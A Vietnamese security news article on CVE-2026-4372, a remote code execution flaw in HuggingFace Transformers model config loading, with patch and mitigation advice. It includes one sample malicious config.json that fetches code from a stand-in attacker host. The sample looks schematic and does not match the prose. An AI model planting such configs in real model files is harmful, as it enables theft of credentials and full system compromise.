Một lỗ hổng CVE nghiêm trọng mới được công bố trong thư viện HuggingFace Transformers, được theo dõi với mã định danh CVE-2026-4372, cho phép kẻ tấn công thực thi mã từ xa (Remote Code Execution – RCE) thông qua các tệp cấu hình mô hình độc hại.
Lỗ hổng này phơi bày một rủi ro chuỗi cung ứng đáng kể trong một trong những framework học máy được sử dụng rộng rãi nhất, gây ảnh hưởng đến các nhà phát triển, doanh nghiệp và các quy trình AI trên toàn cầu.
Chi tiết Lỗ hổng CVE-2026-4372 và Cơ chế Khai thác
Nguồn gốc Lỗ hổng
Lỗ hổng CVE-2026-4372 bắt nguồn từ việc xử lý dữ liệu không tin cậy không đúng cách trong các tệp cấu hình mô hình.
Cụ thể, vấn đề nằm ở thuộc tính _attn_implementation_internal, một thành phần nội bộ được dùng để tối ưu hóa hiệu suất.
Kẻ tấn công có thể chèn trường này vào tệp config.json của một mô hình, khiến thư viện HuggingFace Transformers tải và thực thi mã Python tùy ý trong quá trình tải mô hình tiêu chuẩn.
Cơ chế Bỏ qua Cơ chế Bảo vệ
Điều đáng báo động là cơ chế này xảy ra ngay cả khi kiểm soát bảo mật trust_remote_code=False được thiết lập.
trust_remote_code=False được kỳ vọng sẽ ngăn chặn việc thực thi mã tùy ý từ các nguồn không đáng tin cậy.
Tuy nhiên, lỗ hổng CVE-2026-4372 đã vô hiệu hóa lớp bảo vệ quan trọng này, tạo ra một cửa sổ tấn công mà không cần sự đồng ý rõ ràng từ người dùng.
Phiên bản Bị Ảnh hưởng và Thời gian Phơi nhiễm
Vấn đề này ảnh hưởng đến các phiên bản Transformers từ 4.56.0 đến 5.2.x khi được sử dụng cùng với gói optional kernels.
Đường dẫn mã dễ bị tổn thương đã được giới thiệu vào tháng 8 năm 2025 và vẫn có thể bị khai thác cho đến tháng 3 năm 2026.
Điều này tạo ra một cửa sổ phơi nhiễm kéo dài khoảng sáu tháng, trong đó các hệ thống dễ bị tấn công đã không được bảo vệ.
Kịch bản Tấn công và Hậu quả
Kịch bản Khai thác Thực tế
Trong một kịch bản tấn công điển hình, kẻ đe dọa tải lên một mô hình dường như hợp pháp lên HuggingFace Hub.
Mô hình này bao gồm một tệp config.json được tạo thủ công chứa trường _attn_implementation_internal độc hại, trỏ đến một kho lưu trữ do kẻ tấn công kiểm soát.
Khi nạn nhân tải mô hình bằng chức năng from_pretrained() phổ biến, thư viện Transformers tự động tải xuống và nhập mã được tham chiếu mà không có bất kỳ xác thực hoặc sandbox nào.
Điều này dẫn đến việc thực thi mã ngay lập tức trên hệ thống của nạn nhân, gây ra remote code execution.
Minh họa Cấu hình Độc hại
Ví dụ về một đoạn cấu hình config.json độc hại có thể trông như sau:
{
"model_type": "custom_model",
"_attn_implementation_internal": "_attn_implementation_internal",
"__remote_code__": "https://attacker.com/malicious_code.py",
"architectures": ["CustomModel"],
"auto_map": {
"AutoModelForCausalLM": "CustomModel",
"AutoConfig": "CustomConfig"
}
}
Trong trường hợp này, __remote_code__ sẽ được tải và thực thi bởi thư viện, dẫn đến việc kẻ tấn công có toàn quyền kiểm soát hệ thống.
Hậu quả Sau Khai thác Thành công
Khai thác thành công lỗ hổng CVE này cho phép kẻ tấn công truy cập vào dữ liệu nhạy cảm.
Các dữ liệu này bao gồm thông tin xác thực AWS, khóa SSH, mã thông báo API và các biến môi trường.
Ngoài ra, nó cũng có thể kích hoạt các cơ chế duy trì quyền truy cập, di chuyển ngang qua cơ sở hạ tầng, và khả năng xâm phạm các quy trình CI/CD.
Quy mô Tác động và Thách thức Phát hiện
Phạm vi Ảnh hưởng Rộng lớn
Thư viện Transformers có hơn 2,2 tỷ lượt cài đặt và xử lý khoảng 146 triệu lượt tải xuống mỗi tháng.
Với hơn một triệu mô hình được lưu trữ trên HuggingFace Hub, bề mặt tấn công là rất rộng lớn.
Trong thời gian phơi nhiễm, ước tính có 232 triệu cài đặt dễ bị tổn thương, làm tăng đáng kể khả năng khai thác trong thế giới thực.
Khó khăn trong Phát hiện
Do cuộc tấn công được thực thi trong quá trình tải mô hình bình thường, nó không tạo ra cảnh báo hay bất kỳ chỉ báo rõ ràng nào.
Điều này làm cho việc phát hiện các hoạt động xâm nhập trở nên vô cùng khó khăn, cho phép kẻ tấn công hoạt động mà không bị chú ý.
Các hệ thống phát hiện xâm nhập (IDS) truyền thống có thể gặp khó khăn trong việc nhận diện mối đe dọa này.
Giải pháp và Bản vá Bảo mật
Bản vá và Nâng cấp
HuggingFace đã giải quyết lỗ hổng CVE-2026-4372 trong phiên bản 5.3.0.
Bản vá này đã chặn các thuộc tính nội bộ không an toàn trong quá trình phân tích cú pháp cấu hình.
Đồng thời, nó cũng thực thi các kiểm soát nghiêm ngặt hơn đối với việc tải kernel.
Bản sửa lỗi cũng đảm bảo rằng việc thực thi mã bên ngoài yêu cầu sự đồng ý rõ ràng của người dùng thông qua tham số trust_remote_code=True.
Khuyến nghị Cập nhật và Giảm thiểu Rủi ro
Các tổ chức sử dụng Transformers được khuyến nghị nâng cấp lên phiên bản 5.3.0 hoặc mới hơn ngay lập tức.
Đây là bản vá bảo mật quan trọng để bảo vệ hệ thống khỏi các cuộc tấn công khai thác lỗ hổng CVE này.
Ngoài ra, các đội ngũ nên thực hiện kiểm toán các mô hình đã tải xuống trước đây để tìm kiếm bất kỳ dấu hiệu giả mạo nào.
Giám sát các kết nối đi đáng ngờ và cô lập môi trường thực thi mô hình là các biện pháp bổ sung để giảm thiểu rủi ro.
Việc này giúp tăng cường an toàn thông tin cho các hệ thống AI/ML.
Bài học và Tầm quan trọng của An ninh Chuỗi Cung ứng AI
Vấn đề Rộng hơn trong Hệ sinh thái Học máy
Các nhà nghiên cứu tại Pluto Security đã lưu ý rằng lỗ hổng CVE-2026-4372 làm nổi bật một vấn đề rộng lớn hơn trong các hệ sinh thái học máy.
Đó là việc coi các tệp mô hình và cấu hình là đầu vào đáng tin cậy. Chi tiết phân tích từ Pluto Security cung cấp cái nhìn sâu sắc về thách thức này.
Các mô hình tương tự đã được quan sát thấy trong các framework khác, nơi các chế độ “an toàn” không ngăn được việc thực thi mã vì các đường dẫn nội bộ không được tính đến đầy đủ.
Tăng cường An toàn Thông tin cho AI
Lỗ hổng CVE-2026-4372 nhấn mạnh tầm quan trọng ngày càng tăng của việc bảo mật chuỗi cung ứng AI.
Khi việc áp dụng học máy tăng tốc, kẻ tấn công ngày càng nhắm mục tiêu vào các nền tảng phân phối mô hình.
Điều này biến các quy trình làm việc đáng tin cậy thành các vectơ tấn công có tác động cao, đặt ra thách thức lớn đối với an toàn thông tin trong lĩnh vực trí tuệ nhân tạo.
